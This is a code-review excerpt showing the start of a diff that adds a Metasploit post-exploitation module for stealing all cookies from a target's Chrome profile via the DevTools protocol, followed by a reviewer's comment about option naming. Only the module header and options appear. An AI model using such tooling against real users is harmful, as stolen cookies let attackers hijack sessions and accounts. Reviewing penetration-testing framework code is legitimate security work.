modules/post/multi/gather/chrome_cookies.rb

```diff
@@ -0,0 +1,147 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+
+  GET_ALL_COOKIES_REQUEST = '{"id": 1, "method": "Network.getAllCookies"}'.freeze
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Chrome Gather Cookies',
+      'Description' => "
+      Read all cookies from the Default Chrome profile of the target user.
+      ",
+      'License' => MSF_LICENSE,
+      'Author' => ['mangopdf <mangodotpdf[at]gmail.com>'],
+      'Platform' => %w[linux unix bsd osx],
+      'SessionTypes' => %w[meterpreter shell]))
+
+    register_options(
+      [
+        OptString.new('CHROME_BINARY_PATH', [false, "The path to the user's Chrome binary (leave blank to use the default for the OS)", '']),
+        OptString.new('TEMP_STORAGE_DIR', [false, 'Where to write the html used to steal cookies temporarily', '/tmp']),
```

Comment:
Traditionally, we've used `WritableDir` as an advanced option for this kind of thing:

```ruby
    register_advanced_options [
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
    ]
```